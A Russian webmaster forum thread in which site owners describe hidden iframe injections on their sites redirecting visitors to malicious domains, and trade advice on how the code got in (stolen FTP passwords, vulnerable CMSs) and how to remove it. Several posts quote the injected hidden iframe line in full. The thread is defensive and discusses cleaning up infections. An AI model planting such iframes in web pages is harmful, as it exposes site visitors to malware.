- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
некоторые мои сайты заразились этой хренью, при чем на разных хостингах, единственную инфу по этому поводу нашел тут:
The massive attack of web sites was detected in early March.
An unexpected redirection from several sites to some unknown sites were detected in the first week of March. After server check, an html-code line attached to the end of index.htm was found. The redirection to "http://livelnternet.net/s/in.cgi?3" was set as an nondisplayed IFRAME.
The similar fact was found on different sites which do not have any interlinks.
The livelnternet.net domain has been created on February 2, 2009 linked to EVERYDNS.NET DNS service.
при чем никакой реакции от каспера нет, была раньше на заргузку зараженного pdf файла, но теперь не реагирует вовсе
а теперь незнаю как от него избавится, при чем запись оказалась в БД, как она туда попала не представляю :confused:
подскажите, если кто знает, как лечится от этого?
Возникла точно такая же проблемв на одном из моих сайтов. Может кто нибудь знает как с этим бороться? Заранее благодарен.
при чем никакой реакции от каспера нет, была раньше на заргузку зараженного pdf файла, но теперь не реагирует вовсе
dweb отреагировал, Symantec, естественно, тоже...
Как броться? Сильно не вникал, ищите дыры в цмске или в фтп. Если цмска стандартная - то шансы жопы растут. Проверьте логи админа и фтп.
Сорри что поднимаю старую тему, но столкнулся с той же проблемой. В движке DLE в main.tpl прописываеться ифрейм на livelnternet.net подгружающий вредностое ПО. Вместе с хостером перерыли все файлы - так ничего и не нашли, те кто сталкивались с этим, пожалуйста подскажите, как решили проблему!
цмска не причем, хз как, но проблема решилась, вообщем я сделал полную проверку каспером и он нашел много дыр xss, я обновил все что можно на компе, вплоть до оффиса, поменял пароли на фтп, и залил на сайты файл .ftpaccess с доступом только с моего ип, больше этой гадости нет
чтобы убить этого гада достаточно сделать поиск по БД и файлам сайта (поиск текста) ну и вырезать код iframe естесно
кому непонятно стучите, помогу
Давеча поймал вот такую хрень <iframe src="http://x6r.ru:8080/index.php" width=192 height=154 style="visibility: hidden"></iframe>. За один день внедрилось на разных хостингах, разных сайтах - от простой странички до Wp и других CMS. Кто-нибудь подскажет путь проникновения этой гадости?
Что-то мало инфы вы нашли про iframe (может моя статейка про поиск вирей поможет). Сам уже лечил разные сайты раз 30!
А вот если даже в базу попало (вы уверены?), то нужно смотреть по логам сайта. Смотреть за какую дату были изменения. Искать архив веб-логов и смотреть как там воткнули этот код. Хуже, если методом POST делалось, тогда фиг знает, как найти момент вставки.
Думаю дело не в дыре сайта, а просто фтп угнали и уже в ручную узнали доступ в админку и спокойно добавили код с фремом.
DyaDya добавил 30.07.2009 в 14:39
Кто-нибудь подскажет путь проникновения этой гадости?
DyaDya добавил 30.07.2009 в 14:44
В движке DLE в main.tpl прописываеться ифрейм на livelnternet.net подгружающий вредностое ПО. Вместе с хостером перерыли все файлы - так ничего и не нашли, те кто сталкивались с этим, пожалуйста подскажите, как решили проблему!
Очень странно, вы сказали что он в файле main.tpl, а потом говорите что перерыли все файлы и ничего не нашли.
Если речь о дырах, то тогда понятно. Как уже сказано, заражают чаще всего тупо по сворованным ФТП!
Давеча поймал вот такую хрень <iframe src="http://x6r.ru:8080/index.php" width=192 height=154 style="visibility: hidden"></iframe>. За один день внедрилось на разных хостингах, разных сайтах - от простой странички до Wp и других CMS. Кто-нибудь подскажет путь проникновения этой гадости?
У Вас 100% угнаны пароли от ФТПшников.
Суть такова: у Вас все пароли от разных сервером (сайтов) лежат в одной программе (думается, что Тотал Командер или подобная). Вот их угнали и везде закинули код, где это было возможно.
п.с. Проверьте свой компьютер на наличие троянов. Это все они, заразы :)
Давеча поймал вот такую хрень <iframe src="http://x6r.ru:8080/index.php" width=192 height=154 style="visibility: hidden"></iframe>. За один день внедрилось на разных хостингах, разных сайтах - от простой странички до Wp и других CMS. Кто-нибудь подскажет путь проникновения этой гадости?
было такое, причина - дырявые сайты на говнодвижках. У меня это были WP и instantcms.ru